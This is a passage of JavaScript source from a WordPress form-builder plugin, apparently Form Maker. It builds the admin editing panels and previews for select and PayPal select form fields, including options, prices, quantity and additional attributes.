	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px; vertical-align:top;";
		edit_main_td3.setAttribute("id", "choices");
		
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px;";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
	
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
	
	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
		   el_size.setAttribute("id", "edit_for_input_size");
		   el_size.setAttribute("type", "text");
		   el_size.setAttribute("value", w_size);
		   
			el_size.setAttribute("name", "edit_for_size");
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");
	
	
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	
	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var el_choices_label = document.createElement('label');
	        el_choices_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_choices_label.innerHTML = "Options";
	var el_choices_add = document.createElement('img');
                el_choices_add.setAttribute("id", "el_choices_add");
           	el_choices_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_choices_add.style.cssText = 'cursor:pointer;';
            	el_choices_add.setAttribute("title", 'add');
                el_choices_add.setAttribute("onClick", "add_choise('select',"+i+")");

  var el_choices_important = document.createElement('div');			
  el_choices_important.style.cssText = 'color:red; padding:14px';
  el_choices_important.innerHTML = 'IMPORTANT! Check the "Empty value" checkbox only if you want the option to be considered as empty.';

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
        br3.setAttribute("id", "br1");
	var br4 = document.createElement('br');
        br4.setAttribute("id", "br2");
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br3);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	edit_main_td4.appendChild(el_required_label);
	edit_main_td4_1.appendChild(el_required);
	
	edit_main_td5.appendChild(el_size_label);
	edit_main_td5_1.appendChild(el_size);
	
	edit_main_td3.appendChild(el_choices_label);
	edit_main_td3_1.appendChild(el_choices_add);
  edit_main_td3_1.appendChild(el_choices_important);

  //??????????????????
    var div_ = document.createElement('div');
    div_.style.cssText = 'border-bottom:1px dotted black; width: 248px;';
    var br = document.createElement('br');
    var el_choices_mini_label = document.createElement('b');
    el_choices_mini_label.innerHTML="Option name";
    el_choices_mini_label.style.cssText='padding-right: 20px; padding-left: 20px; font-size:9px';
    var el_choices_price_mini_label = document.createElement('b');
    el_choices_price_mini_label.innerHTML="Price";
    el_choices_price_mini_label.style.cssText='padding-right: 15px; padding-left: 15px;  font-size:9px';
    var el_choices_remove_mini_label = document.createElement('b');
    el_choices_remove_mini_label.innerHTML="Empty value";
    el_choices_remove_mini_label.style.cssText='padding-right: 2px; padding-left: 2px; font-size:9px';
    var el_choices_dis_mini_label = document.createElement('b');
    el_choices_dis_mini_label.innerHTML="Delete";
    el_choices_dis_mini_label.style.cssText='padding-left: 2px; padding-right: 2px; font-size:9px';
    div_.appendChild(br);
    div_.appendChild(el_choices_mini_label);
    div_.appendChild(el_choices_remove_mini_label);
    div_.appendChild(el_choices_dis_mini_label);
    edit_main_td3.appendChild(div_);
    //??????????????????????????
	
	n=w_choices.length;
	for(j=0; j<n; j++)
	{	
		var br = document.createElement('br');
		br.setAttribute("id", "br"+j);
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_option"+j);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("value", w_choices[j]);
			el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
			el_choices.setAttribute("onKeyUp", "change_label('"+i+"_option"+j+"', this.value)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_option"+j+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_option("+j+","+i+")");
			
		var el_choices_dis = document.createElement('input');
			el_choices_dis.setAttribute("type", 'checkbox');
			el_choices_dis.setAttribute("title", 'Empty value');
			el_choices_dis.setAttribute("id", "el_option"+j+"_dis");
			el_choices_dis.setAttribute("onClick", "dis_option('"+i+"_option"+j+"', this.checked)");
			el_choices_dis.style.cssText ="vertical-align: middle; margin-right: 24px; margin-left: 24px;";
			if(w_choices_disabled[j])
				el_choices_dis.setAttribute("checked", "checked");
			
		edit_main_td3.appendChild(br);
		edit_main_td3.appendChild(el_choices);
		edit_main_td3.appendChild(el_choices_dis);
		edit_main_td3.appendChild(el_choices_remove);
	
	}


	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr4);
	
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_own_select");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
	    
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
		var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			

      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
		
	var table_little = document.createElement('table');
           	table_little.setAttribute("id", i+"_table_little");
			
      	var tr_little1 = document.createElement('tr');
	        tr_little1.setAttribute("id", i+"_element_tr1");
		
      	var tr_little2 = document.createElement('tr');
 	        tr_little2.setAttribute("id", i+"_element_tr2");
			
      	var td_little1 = document.createElement('td');
         	td_little1.setAttribute("valign", 'top');
           	td_little1.setAttribute("id", i+"_td_little1");
			
      	var td_little2 = document.createElement('td');
        	td_little2.setAttribute("valign", 'top');
           	td_little2.setAttribute("id", i+"_td_little2");
			
   
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	var select_ = document.createElement('select');
		select_.setAttribute("id", i+"_elementform_id_temp");
		select_.setAttribute("name", i+"_elementform_id_temp");
		select_.style.cssText = "width:"+w_size+"px";
		select_.setAttribute("onchange", "set_select(this)");
		
	for(j=0; j<n; j++)
	{      	
		var option = document.createElement('option');
		option.setAttribute("id", i+"_option"+j);
	if(w_choices_disabled[j])
		option.value="";
	else
		option.setAttribute("value", w_choices[j]);
		
		option.setAttribute("onselect", "set_select('"+i+"_option"+j+"')");
           	option.innerHTML = w_choices[j];
	if(w_choices_checked[j]==1)
		option.setAttribute("selected", "selected");
		select_.appendChild(option);
	}			
	
    
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
	td2.appendChild(adding_type);
	
	td2.appendChild(adding_required);
      	td2.appendChild(select_);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
}

function form_maker_getElementsByAttribute(node,tag,attr,value){
  var elems = (tag=="*" && node.all) ? node.all : node.getElementsByTagName(tag),
    returnElems = new Array(),
    nValue = (typeof value!="undefined") ? new RegExp("(^|\\s)" + value + "(\\s|$)") : null,
    nAttr,
    cur;
  for (var i = 0; i < elems.length; i++) {
    cur = elems[i];
    nAttr = cur.getAttribute && cur.getAttribute(attr);
    if (typeof nAttr == "string" && nAttr.length > 0) {
      if (typeof value == "undefined" || (nValue && nValue.test(nAttr))) {
        returnElems.push(cur);
      }
    }
  }
  return returnElems;
}

function add_quantity(i) {
  div_ = document.getElementById(i+"_divform_id_temp");
  // if (div_.getElementById(i + "_element_quantityform_id_temp")) {
  if (form_maker_getElementsByAttribute(div_, "*", "id", i + "_element_quantityform_id_temp") != '') {
    div_.removeChild(document.getElementById(i + "_element_quantity_spanform_id_temp"));
    return;
  }
  select_ = document.createElement('input');
  select_.setAttribute("type", 'text');				
  select_.setAttribute("value", '1');				
  select_.setAttribute("id", i + "_element_quantityform_id_temp");
  select_.setAttribute("name", i + "_element_quantityform_id_temp");
  select_.setAttribute("onKeyPress", "return check_isnum(event)");
  select_.setAttribute("onChange", "change_value('" + i + "_element_quantityform_id_temp', this.value)");
  select_.setAttribute("onKeyUp", "change_value_for_total('"+i+"','form_id_temp')");
  select_.style.cssText = "width:30px; margin:2px 0px";
  var select_label = document.createElement('label');
  select_label.innerHTML =  "<!--repstart-->Quantity<!--repend-->";
  select_label.style.cssText = "margin-right:5px";		
  select_label.setAttribute("class", 'mini_label');
  select_label.setAttribute("id", i + '_element_quantity_label_form_id_temp');
  var span_ = document.createElement('span');
  span_.style.cssText = "margin-right:15px";
  span_.setAttribute("id", i + '_element_quantity_spanform_id_temp');
  span_.appendChild(select_label);
  span_.appendChild(select_);
  if (div_.firstChild) {
    div_.insertBefore(span_, div_.firstChild);
  }
  else {
    div_.appendChild(span_);
  }
}

function type_paypal_select(i, w_field_label, w_field_label_pos, w_size, w_choices, w_choices_price, w_choices_checked, w_required, w_quantity, w_class, w_attr_name, w_attr_value, w_choices_disabled, w_property, w_property_type, w_property_values){
	document.getElementById("element_type").value="type_paypal_select";
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");
	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
		edit_main_td3.setAttribute("id", "choices");
		
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
	
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
	
	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
		   el_size.setAttribute("id", "edit_for_input_size");
		   el_size.setAttribute("type", "text");
		   el_size.setAttribute("value", w_size);
		   
			el_size.setAttribute("name", "edit_for_size");
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");
	
	
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	
	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	
	
	var el_quantity_label = document.createElement('label');
	    el_quantity_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_quantity_label.innerHTML = "Quantity property";
		
	var el_quantity = document.createElement('input');
        el_quantity.setAttribute("type", "checkbox");
        el_quantity.setAttribute("value", "yes");
        el_quantity.setAttribute("onclick", "add_quantity('"+i+"')");
	
	if(w_quantity=="yes")
		el_quantity.setAttribute("checked", "checked");
	
	
	var el_product_option_label = document.createElement('label');
	    el_product_option_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;";
		el_product_option_label.innerHTML = "Product properties";
	
	var el_product_option_add_a = document.createElement('a');
		// el_product_option_add_a.setAttribute("rel", "{handler: 'iframe', size: {x: 650, y: 375}}"	);
		// el_product_option_add_a.setAttribute("href","index.php?option=com_formmaker&task=product_option_fmc&field_id="+i+"&tmpl=component");
		// el_product_option_add_a.setAttribute("class","modal");
    el_product_option_add_a.setAttribute("href", url_for_ajax + "?action=product_option_fmc&field_id=" + i + "&url_for_ajax=" + url_for_ajax + "&width=600&height=400&TB_iframe=1");
		el_product_option_add_a.setAttribute("class","thickbox-preview");

	var el_product_option_add_img = document.createElement('img');
		el_product_option_add_img.setAttribute("src", fmc_plugin_url+'/images/add.png');
		
	var el_product_option_add_ul = document.createElement('ul');
		el_product_option_add_ul.setAttribute("id", 'option_ul');
		el_product_option_add_ul.style.cssText="list-style-type: none; padding:0px"
				
				
	el_product_option_add_a.appendChild(el_product_option_add_img);
	
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
				
				
				
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var el_choices_label = document.createElement('label');
	        el_choices_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_choices_label.innerHTML = "Options";
	var el_choices_add = document.createElement('img');
